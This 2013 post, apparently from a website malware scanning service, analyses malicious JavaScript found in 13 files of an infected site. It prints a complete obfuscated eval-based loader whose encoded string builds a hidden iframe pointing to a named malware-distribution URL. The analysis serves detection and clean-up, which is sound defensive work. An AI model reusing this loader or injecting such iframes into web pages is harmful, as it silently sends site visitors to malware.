Monday, May 13, 2013

Website uses JavaScript libraries which are located on remote hacked server and containing JS exploit


Website uses JavaScript libraries containing JS exploit and located on remote hacked server 

Background

Online Website Malware Scanner has identified malicious JavaScript libraries on the scanned website. It looks like the remote and now blacklisted www.omatanet.net was hacked and infected with exploits so that later to be used as intermediate server for malware distribution.

These libraries are injecting hidden  iframe connecting visitor to malware distributor. This infected website hosts suspicious JavaScript code injected in 13 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon May 13 17:21:26 2013
Infected website's files: 13
Website malware scan report link: http://goo.gl/uuqlS



Quttera | Website Malware Scanner
Quttera | Website Malware Scanner


JavaScript exploit detected in 13 files
JavaScript exploit detected in 13 files


Malware entry


Malware entry details.

Beautified script


  1. = eval;
  2. = "0" + "x";
  3. = 0;
  4. try {
  5.     a *= 2
  6. } catch (q) {
  7.     a = 1
  8. }
  9. if (!a) {
  10.     try {
  11.         document["\x62od" + "y"]++
  12.     } catch (q) {
  13.         a2 = "_"
  14.     }
  15.     z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_6e_7e_69_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_6e_7e_69_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_80_6b_6f_7c_74_6a_6c_7e_35_79_7c_36_6a_76_7c_75_7b_39_37_35_77_6f_77_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_6e_7e_69_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6e_7e_69_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_6e_7e_69_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_6e_7e_69_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6e_7e_69_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
  16.     za = "";
  17.     for (= 0; i < z.length; i++) {
  18.         za += String["fromCharCode"](e(+ (z[i])) - 5 - 2);
  19.     }
  20.     zaz = za;
  21.     e(zaz);
  22. }



Malicious payload


Decoded payload generates hidden iframe to http://ydhumcew.ru/count20.php


Blacklisting status

The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.